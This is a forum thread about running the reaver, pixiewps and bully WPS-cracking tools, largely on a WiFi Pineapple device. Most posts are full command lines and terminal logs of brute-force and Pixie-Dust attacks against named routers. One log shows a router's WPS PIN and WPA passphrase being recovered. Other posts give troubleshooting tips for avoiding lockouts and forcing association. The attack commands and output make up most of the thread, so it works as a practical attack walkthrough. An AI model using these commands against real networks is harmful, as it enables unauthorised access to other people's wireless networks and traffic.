Jump to content

[Release] pixiewps 1.1 & reaver 1.5.2


DataHead

Recommended Posts

Wash and bully work with the disabled wlan1 tough I have to prevent wps lockout somehow.

root@WIN7B2:~# bully mon0 -b A0:F3:B2:E4:3A:62 -e "myAP" -c 4
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '4'
[!] Using '00:15:25:94:44:11' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'a0:f3:b2:e4:3a:62' on channel '4'
[+] Got beacon for 'myAP' (a0:f3:b2:e4:3a:62)
[+] Loading randomized pins from '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '44421090'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '50901098'
[+] Rx( Auth ) = 'Timeout'   Next pin '50901098'
[+] Rx( Assn ) = 'Timeout'   Next pin '50901098'
[+] Rx( Auth ) = 'Timeout'   Next pin '50901098'
[+] Rx( Assn ) = 'Timeout'   Next pin '50901098'
[+] Rx( Assn ) = 'Timeout'   Next pin '50901098'
[!] Received M2D or out of sequence WPS Message
[+] Rx(  M5  ) = 'WPSFail'   Next pin '50901098'
[+] Rx( Auth ) = 'Timeout'   Next pin '50901098'
[+] Rx( Assn ) = 'Timeout'   Next pin '50901098'
[+] Rx( Assn ) = 'Timeout'   Next pin '50901098'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '10541098'
[+] Rx( Auth ) = 'Timeout'   Next pin '10541098'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx( Auth ) = 'Timeout'   Next pin '10541098'
[+] Rx( Assn ) = 'Timeout'   Next pin '10541098'
[+] Rx( Assn ) = 'Timeout'   Next pin '10541098'
[+] Rx( Auth ) = 'Timeout'   Next pin '10541098'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '11481096'
[+] Rx( Auth ) = 'Timeout'   Next pin '11481096'
[+] Rx( Assn ) = 'Timeout'   Next pin '11481096'
[+] Rx(  M5  ) = 'Pin1Bad'   Next pin '85851092'
[!] WPS lockout reported, sleeping for 43 seconds ...
[!] WPS lockout reported, sleeping for 43 seconds ...

Current Disk Usage:

Filesystem                Size      Used Available Use% Mounted on
rootfs                    3.2M    740.0K      2.5M  23% /
/dev/root                11.8M     11.8M         0 100% /rom
tmpfs                    30.2M    124.0K     30.1M   0% /tmp
tmpfs                   512.0K         0    512.0K   0% /dev
/dev/mtdblock3            3.2M    740.0K      2.5M  23% /overlay
overlayfs:/overlay        3.2M    740.0K      2.5M  23% /
/dev/sdcard/sd1           2.8G    106.0M      2.5G   4% /sd


Current Memory Usage:

             total         used         free       shared      buffers
Mem:         61804        43664        18140            0         6152
-/+ buffers:              37512        24292
Swap:      1000132            0      1000132

Here is my disk usage.

Unfortunately reaver still gives me the same errors as before.

Thanks for the help.

Link to comment
Share on other sites

  • Replies 86
  • Created
  • Last Reply

Top Posters In This Topic

Okay, doing a wash scan via ssh,

try taking down the monitor mode enabled device before using wash / reaver / bully.

After another reset I installed reaver and bully on the sd card but either cannot associate or never sends a pin.

mkdir /etc/reaver

opkg update

opkg -d sd install reaver

ln -s /sd/etc/reaver/reaver.db /etc/reaver/

ln -s /sd/usr/bin/reaver /usr/bin/

ln -s /sd/usr/bin/wash /usr/bin/

:blink:

Link to comment
Share on other sites

  • 1 month later...

Hello Guys im having a issue with reaver not getting the correct information from the ap to do a successful reaver attack. ive tried the same ap on kali and it gets the pin and pass phrase. any help would be appreciated!! thank you

root@Pineapple:~# reaver -i wlan1mon -c7 -b XX:XX:XX:53:12:6C -vvv -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Switching wlan1mon to channel 7
[+] Waiting for beacon from XX:XX:XX:53:12:6C
[+] Associated with XX:XX:XX:53:12:6C (ESSID: Mascato)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 1142bb9d3b345c4655f269e279a47ac8
[P] PKE: d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b
[P] WPS Manufacturer: Belkin International
[P] WPS Model Name: Belkin N600DB Wireless Router
[P] WPS Model Number: F9K1102 v2
[P] Access Point Serial Number: 20422GF2204541
[+] Received M1 message
[P] R-Nonce: aa2e55a0e5abae5201c8c664efb46df6
[P] PKR: 4c24122323090189f6e58696e76769aceff61432b8aa4fcea7ff12eeaefd42cd52d2a56077452875df2419e0544192ad03287838d6e1811c887f123b1e87e2a00863e1b6a93216677e8e9f7f1f6280ba8eb13dbf2a56eb30478636bf4fa650bdbb436c7dbf198b622ff10e505a66d7e6452eb2fe25c7b06f448d4d79681adfd28f30395c656bf1ac5295f1ecfaf0bd0966497e1cf11ce02f0a6f6033e8fd66e3f6affdf0f5f42ded54ee7e61c3add7b810b6178e941d0a78b3384aeb61925d51
[P] AuthKey: 6111f2697163f20b7a7aee495b94b8ccd3f080904c0038765e0cbd91e057f393
[+] Sending M2 message
[P] E-Hash1: dd1337c644e08b60bdedd33c558ec78713364d3ea7a76d110f49a886f39918b4
[P] E-Hash2: d437d4e3a0bcb16bcb4124162e6f5ccd21e5a3a5d5ed2d8e0a483c79113ddf4e
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 12 s 80 ms
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
[Pixie-Dust]
[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
root@Pineapple:~#
root@kali11:/home/chris# reaver -i wlan1mon -c 7 -b XX:XX:XX:XX:XX:XX -vvv -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg
[+] Switching wlan1mon to channel 7
[+] Waiting for beacon from XX:XX:XX:53:12:6C
[+] Associated with XX:XX:XX:53:12:6C (ESSID: Mascato)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 3e:2b:ce:1b:1d:a2:da:88:6f:b1:ea:f9:0e:7f:12:c5
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Belkin International
[P] WPS Model Name: Belkin N600DB Wireless Router
[P] WPS Model Number: F9K1102 v2
[P] Access Point Serial Number: 20422GF2204541
[+] Received M1 message
[P] R-Nonce: 5b:95:e2:eb:9e:ee:fb:be:b3:d8:23:8e:83:8a:1e:45
[P] PKR: 51:aa:9d:86:4e:69:69:00:b7:c1:63:ae:4c:88:fb:00:80:25:be:06:e1:ec:27:49:51:25:cd:9f:7b:56:19:a3:de:98:ee:98:e8:f5:ae:90:3e:68:14:12:0f:de:5b:b9:c9:f3:69:9b:e8:d8:29:a1:7d:c8:9b:86:c1:d1:17:40:2c:ea:69:74:70:91:74:c2:b7:49:1e:00:ce:8a:de:9e:e0:b1:e8:bb:d7:64:96:9f:d3:d6:e6:a2:09:af:da:c2:af:a2:3f:7d:02:db:d2:1b:65:c9:ef:ef:f6:ca:af:4f:d4:0e:43:53:10:01:ca:d8:73:40:57:8a:b1:26:d3:fc:2d:85:cf:2f:59:53:89:cb:e2:00:ca:b6:6d:d4:3b:c3:fe:70:7c:36:6d:9e:0c:db:f6:0a:f0:96:fc:d3:1a:ac:23:34:d2:e9:4c:4f:87:d7:77:82:bc:2c:5d:20:d7:df:1f:f8:a1:44:4b:5a:50:25:d0:a4:fb:3d:15:b4:11:06
[P] AuthKey: bb:74:56:24:e7:dd:ac:a7:8a:09:1e:a2:d9:60:ec:43:83:66:59:16:e7:3e:36:dd:57:9a:33:30:51:ea:86:3c
[+] Sending M2 message
[P] E-Hash1: af:c3:d0:f7:e9:b8:8f:16:37:89:bf:79:24:1e:99:d9:0f:8e:ce:2e:2c:9b:14:9c:a3:7c:74:4b:a9:eb:03:75
[P] E-Hash2: 9b:9f:14:f8:55:90:5d:b6:18:8d:93:7b:86:e1:f0:5e:d7:34:ed:a3:06:4e:6b:0a:37:8b:e5:ab:ed:a0:d3:b3
[+] Running pixiewps with the information, wait ...
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [*] E-S1: 2c:19:f3:d0:12:83:8d:81:56:b0:c8:7d:37:8f:9a:15
[Pixie-Dust] [*] E-S2: 2c:19:f3:d0:12:83:8d:81:56:b0:c8:7d:37:8f:9a:15
[Pixie-Dust] [+] WPS pin: 14987236
[Pixie-Dust]
[+] Running reaver with the correct pin, wait ...
[+] Cmd : reaver -i wlan1mon -b 94:10:3E:53:12:6C -c 7 -s y -vv -p 14987236
[Reaver Test] [+] BSSID: XX:XX:XX:53:12:6C
[Reaver Test] [+] Channel: 7
[Reaver Test] [+] WPS PIN: '14987236'
[Reaver Test] [+] WPA PSK: 'XXXXXXXX'
[Reaver Test] [+] AP SSID: 'XXXXXX'
Link to comment
Share on other sites

  • 3 months later...

for me it tries the same pin over and over. how do I change the arguments so it doesn't ignore it and tries a new pin even if it doesn't get a nack

I'm not sure that you can... Have you tried playing around with the arguments though? For picky accesspoints I've found -N for no nacks helps, and increasing delays. Even the -n for other nack related... Maybe -w act like a windows registrar... I know I've had that feeling too that, maybe it is is getting it, just not telling me... However when changing it to the correct pin, and it's still failing, well maybe the access point is being clever or something... I've also noticed sometimes you have to manually associate with aireplay-ng as for some reason reaver itself has trouble associating with certain APs... Basically exhaust all possibilities with the switches! :smile:

Link to comment
Share on other sites

  • 4 weeks later...

I’ve been trying to get reaver working on the nano for about 5 hours now...

Wash reports nothing with WPS, Airodump does. Reaver is working from another device on my router, just not from the nano, I'v tried using external NICs on the pineapple aswell, i'm using the version in the pineapples repos.

I'v also tried taking wlan1 down before and after and doing airmon-ng check kill, trying all parameters in wash.

Any ideas?

CH  6 ][ Elapsed: 12 s ][ 2016-01-27 08:08                                         
                                                                                                                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS     ESSID
                                                                                                                                                                                             
 10:6F:3F:62:04:59  -58 100      135     1510  102   6  54e  WPA2 CCMP   PSK  1.0     Buffalo Soldier                                                                                        
                                                                                                                                                                                             
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                  
root@Pineapple:/usr/lib# wash -i wlan1mon

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

BSSID              Channel  RSSI  WPS Version  WPS Locked  ESSID
--------------------------------------------------------------------------------------
root@Pineapple:/usr/lib# reaver -i wlan1mon -b 10:6F:3F:62:04:59 -c 6

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 10:6F:3F:62:04:59
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: (null))
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[+] Associated with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
[!] WARNING: Failed to associate with 10:6F:3F:62:04:59 (ESSID: Buffalo Soldier)
Link to comment
Share on other sites

  • 3 months later...
37 minutes ago, zabses said:

Hello! :wink:

Share please Make file for reaver_Big_endian-2

 

To be honest you can use a tool called https://github.com/aanarchyy/bully with a bit of work.

Link to comment
Share on other sites

  • 1 month later...
  • 8 months later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...